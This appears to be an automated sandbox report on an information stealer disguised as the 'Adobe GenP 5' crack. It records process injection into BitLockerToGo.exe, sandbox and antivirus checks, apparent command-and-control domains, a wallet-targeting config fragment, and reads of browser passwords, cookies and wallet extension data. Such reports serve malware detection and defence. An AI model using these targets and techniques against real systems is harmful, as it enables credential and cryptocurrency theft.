            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696428655f
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382147088.00000000058B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696428655p
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2609310539.000000000353D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610206600.000000000353D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2476797050.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2356694769.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2610591925.0000000003574000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2517419497.0000000003574000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWG[$)
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696428655t
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
            Source: Adobe GenP 5.exe, 00000000.00000002.2309110578.0000000001F48000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696428655s
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: ms.portal.azure.comVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696428655o
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696428655t
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: dev.azure.comVMware20,11696428655j
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
            Source: BitLockerToGo.exe, 00000003.00000003.2382147088.00000000058B4000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: YNVMware
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696428655x
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
            Source: BitLockerToGo.exe, 00000003.00000003.2382320581.0000000005843000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information queried: ProcessInformation
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00439AF0 LdrInitializeThunk, | 3_2_00439AF0

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 protect: page execute and read and write
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000 value starts with: 4D5A
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: rapeflowwj.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: crosshuaht.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: sustainskelet.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: aspecteirs.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: energyaffai.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: necklacebudi.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: discokeyus.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: grannyejh.lat
            Source: Adobe GenP 5.exe, 00000000.00000002.2310216915.000000000AE80000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: icyidentifysu.click
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 30A3008
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 400000
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 401000
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 43E000
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 441000
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: 450000
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
            Source: C:\Users\user\Desktop\Adobe GenP 5.exe | Queries volume information: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe VolumeInformation
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: BitLockerToGo.exe, 00000003.00000003.2517544974.00000000035E4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2493579531.00000000035E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: s%\Windows Defender\MsMpeng.exe
            Source: BitLockerToGo.exe, 00000003.00000003.2476870231.00000000035E4000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match | File source: Process Memory Space: BitLockerToGo.exe PID: 5448, type: MEMORYSTR
            Source: Yara match | File source: sslproxydump.pcap, type: PCAP
            Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/Electrum
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
            Source: BitLockerToGo.exe, 00000003.00000003.2452701228.000000000588F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: Jaxx Libertyn%&<x
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
            Source: BitLockerToGo.exe, 00000003.00000003.2517337985.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
            Source: BitLockerToGo.exe, 00000003.00000003.2517337985.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
            Source: BitLockerToGo.exe, 00000003.00000003.2609625535.000000000356A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum
            Source: BitLockerToGo.exe, 00000003.00000003.2517337985.00000000035C5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqlite
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflа
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflа
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
            Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
